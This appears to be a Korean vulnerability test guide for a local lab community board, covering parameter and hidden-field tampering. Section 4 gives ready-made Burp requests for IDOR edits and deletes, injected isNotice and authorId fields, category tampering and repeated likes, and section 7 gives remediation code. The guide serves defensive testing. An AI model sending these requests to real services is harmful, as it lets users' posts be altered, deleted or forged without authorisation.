================================================================================
[VCE-CM-03] 파라미터값 및 히든필드 조작 가능성
도메인: community
위험도: High
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
파라미터 조작(Parameter Tampering)은 클라이언트가 서버로 전송하는 요청의
파라미터값을 임의로 변조하여 의도하지 않은 동작을 유발하는 공격이다.

주요 공격 유형:
  1. IDOR (Insecure Direct Object Reference):
     타 사용자가 소유한 리소스의 ID를 직접 지정하여 무단 접근/수정/삭제
  2. 권한 우회 (Privilege Escalation):
     isNotice=true, role=ADMIN 등 권한 관련 파라미터를 요청에 강제 삽입
  3. 히든 필드 조작:
     프론트엔드에서 숨겨진 필드(hidden input, disabled 상태)를 API 직접 호출로
     우회하여 서버에 전달

VCE 커뮤니티에서는 게시글 수정/삭제 API에서 작성자 본인 확인 로직이 불충분하거나
서버가 클라이언트 전달 값을 그대로 신뢰할 경우 IDOR 및 권한 우회가 가능하다.

영향 범위:
  - 타 사용자 게시글 무단 수정/삭제
  - 일반 게시글을 공지사항으로 무단 변경
  - 잘못된 카테고리에 게시글 강제 배정
  - 조회수/좋아요 수 조작


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
대상 기능:
  - 게시글 수정 (PUT /api/community/posts/{id})
  - 게시글 삭제 (DELETE /api/community/posts/{id})
  - 게시글 좋아요 (POST /api/community/posts/{id}/likes)
  - 조회수 조작 (GET /api/community/posts/{id})
  - 댓글 수정/삭제 (PUT/DELETE /api/community/posts/{id}/comments/{commentId})

주요 엔드포인트:
  PUT    /api/community/posts/{id}
  DELETE /api/community/posts/{id}
  PUT    /api/community/posts/{id}/comments/{commentId}
  DELETE /api/community/posts/{id}/comments/{commentId}
  POST   /api/community/posts/{id}/likes
  DELETE /api/community/posts/{id}/likes

접근 URL (로컬):
  http://localhost:8080/api/community/posts/1
  http://localhost:8080/api/community/posts/2


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[IDOR 원리]
서버가 요청 URL의 {id}에 해당하는 리소스를 반환할 때, 해당 리소스의 소유자와
요청자가 동일한지 검증하지 않으면 타 사용자 데이터에 접근 가능하다.

예시:
  공격자(userId=2)가 피해자(userId=1)의 게시글(postId=5) 삭제:
  DELETE /api/community/posts/5
  Authorization: Bearer [공격자 토큰]

  서버가 postId=5의 소유자 확인 없이 삭제 처리 → IDOR 취약

[권한 상승 원리]
서버가 클라이언트가 전달한 파라미터를 검증 없이 신뢰할 경우:
  - isNotice=true → 공지사항 권한 없는 사용자가 공지사항 등록
  - authorId=1 → 다른 사람 명의로 게시글 작성
  - role=ADMIN → 관리자 권한 취득 시도


4. 테스트 절차 (Step-by-step)
--------------------------------------------------------------------------------

[STEP 1] IDOR - 타 사용자 게시글 수정

사전 준비:
  1-1. test@vce.com(계정A)으로 로그인하여 JWT 토큰 획득
  1-2. admin@vce.com(계정B)이 작성한 게시글 ID 파악 (예: postId=10)
       GET /api/community/posts?page=0 응답에서 authorEmail 또는 authorId 확인
  1-3. 계정A의 토큰으로 계정B의 게시글 수정 시도

Burp Repeater - IDOR 수정:
------------------------------------------------------------------------
PUT /api/community/posts/10 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[계정A 토큰]

{
  "title": "IDOR 공격으로 수정된 제목",
  "content": "내용이 변조되었습니다.",
  "categoryId": 1
}
------------------------------------------------------------------------

기대 결과 (취약):
  - 200 OK + 게시글 수정 성공
  - 실제로 postId=10의 내용이 변경됨

기대 결과 (안전):
  - 403 Forbidden + "권한이 없습니다" 메시지

[STEP 2] IDOR - 타 사용자 게시글 삭제

Burp Repeater - IDOR 삭제:
------------------------------------------------------------------------
DELETE /api/community/posts/10 HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[계정A 토큰]

------------------------------------------------------------------------

기대 결과 (취약):
  - 204 No Content + 게시글 삭제 성공

[STEP 3] 권한 우회 - isNotice 파라미터 강제 삽입

일반 사용자(test@vce.com)가 공지사항 게시글 작성 시도:

Burp Repeater:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[일반 사용자 토큰]

{
  "title": "중요 공지사항 (위장)",
  "content": "일반 사용자가 공지사항으로 등록 시도",
  "categoryId": 1,
  "isNotice": true
}
------------------------------------------------------------------------

기대 결과 (취약):
  - 201 Created + isNotice=true로 저장됨
  - 공지사항 목록에 해당 게시글 노출

기대 결과 (안전):
  - 403 Forbidden 또는 isNotice 필드 무시 후 false로 저장

[STEP 4] 권한 우회 - authorId 파라미터 조작 (다른 사람 명의 게시글 작성)

Burp Repeater:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[계정A 토큰]

{
  "title": "관리자 명의 게시글",
  "content": "계정A가 관리자 명의로 작성 시도",
  "categoryId": 1,
  "authorId": 1
}
------------------------------------------------------------------------

판단: 응답의 author 정보가 계정A인지 authorId=1(관리자)인지 확인

[STEP 5] categoryId 조작

존재하지 않는 카테고리:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

{
  "title": "카테고리 조작 테스트",
  "content": "테스트 내용",
  "categoryId": 9999
}
------------------------------------------------------------------------

기대 결과:
  - 404 또는 400 에러: 안전
  - 200 OK + 게시글 저장: 취약 (카테고리 검증 없음)

관리자 전용 카테고리 접근:
------------------------------------------------------------------------
POST /api/community/posts HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[일반 사용자 토큰]

{
  "title": "관리자 전용 카테고리 게시글",
  "content": "테스트 내용",
  "categoryId": 100
}
------------------------------------------------------------------------

[STEP 6] 좋아요 수 조작 - 중복 좋아요

Burp Suite Intruder로 동일 요청 반복 전송:
------------------------------------------------------------------------
POST /api/community/posts/1/likes HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...

------------------------------------------------------------------------

Intruder 설정:
  - Attack Type: Sniper
  - Payload: Null payloads, 100회 반복
  - 목표: 좋아요 수가 1 이상 증가하는지 확인

기대 결과 (취약):
  - 100회 요청 후 좋아요 수 100 증가

기대 결과 (안전):
  - 두 번째 요청부터 409 Conflict 또는 "이미 좋아요한 게시글" 에러

[STEP 7] 댓글 IDOR - 타 사용자 댓글 수정/삭제

Burp Repeater - 댓글 IDOR 수정:
------------------------------------------------------------------------
PUT /api/community/posts/1/comments/5 HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[계정A 토큰, commentId=5는 계정B 소유]

{
  "content": "IDOR로 수정된 댓글 내용"
}
------------------------------------------------------------------------

Burp Repeater - 댓글 IDOR 삭제:
------------------------------------------------------------------------
DELETE /api/community/posts/1/comments/5 HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...[계정A 토큰]

------------------------------------------------------------------------

[STEP 8] 정수 범위 이탈 테스트 (Edge Case)

음수 ID:
  GET /api/community/posts/-1
  PUT /api/community/posts/-1 (동일한 요청 바디 포함)

매우 큰 정수:
  GET /api/community/posts/99999999999999999

0 값:
  GET /api/community/posts/0

기대 결과 (안전):
  - 400 Bad Request 또는 404 Not Found

기대 결과 (취약):
  - 500 Internal Server Error (예외 미처리)
  - DB 에러 메시지 노출


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------
취약 (아래 중 하나라도 해당):
  - 타 사용자 게시글/댓글 수정 또는 삭제 성공 (200/204 반환)
  - isNotice=true 파라미터로 공지사항 등록 성공
  - authorId 조작으로 타인 명의 게시글 작성 성공
  - 좋아요 중복 허용으로 카운트 부정 증가
  - 존재하지 않는 categoryId로 게시글 저장 성공
  - ID에 음수/0/문자열 입력 시 500 에러 (예외 미처리)

안전 (아래 모두 해당 시):
  - 타 사용자 리소스 접근 시 403 Forbidden 반환
  - isNotice, authorId 등 권한 파라미터 서버 측 무시
  - 좋아요 중복 시 409 또는 에러 반환
  - 비정상 ID 입력 시 400/404 반환 (에러 메시지에 내부 정보 미포함)


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------
파일: backend/src/main/java/.../community/service/CommunityService.java
  - updatePost() 메서드: post.getAuthor().getId() 비교 로직 미존재
  - deletePost() 메서드: 소유자 검증 없이 삭제 처리

파일: backend/src/main/java/.../community/controller/CommunityController.java
  - @RequestBody PostRequest에 isNotice 필드 그대로 바인딩
  - authorId를 클라이언트 값 그대로 사용

파일: backend/src/main/java/.../community/dto/PostRequest.java
  - isNotice, authorId 필드가 DTO에 포함되어 있어 외부에서 주입 가능


7. 권고 조치
--------------------------------------------------------------------------------
[IDOR 대응]
1. 리소스 접근 전 소유자 검증 필수
   Post post = postRepository.findById(postId)
     .orElseThrow(() -> new NotFoundException("게시글 없음"));
   if (!post.getAuthor().getId().equals(currentUser.getId())) {
     throw new ForbiddenException("수정 권한이 없습니다");
   }

2. Spring Security @PreAuthorize 활용
   @PreAuthorize("@postSecurityService.isOwner(#postId, principal)")

[권한 상승 대응]
1. isNotice 등 권한 관련 필드를 DTO에서 제거하고 서버에서만 설정
   - 일반 사용자 요청에서 isNotice 필드 무시
   - 관리자 전용 API 분리: PUT /api/admin/community/posts/{id}/notice

2. @JsonIgnore 또는 별도 AdminPostRequest DTO 사용
   public class PostRequest {
     private String title;
     private String content;
     private Long categoryId;
     // isNotice 필드 제거 - 일반 사용자 DTO에서 미포함
   }

[좋아요 중복 대응]
  - 복합 유니크 키 적용: UNIQUE(post_id, user_id)
  - 중복 시 409 Conflict 반환

================================================================================
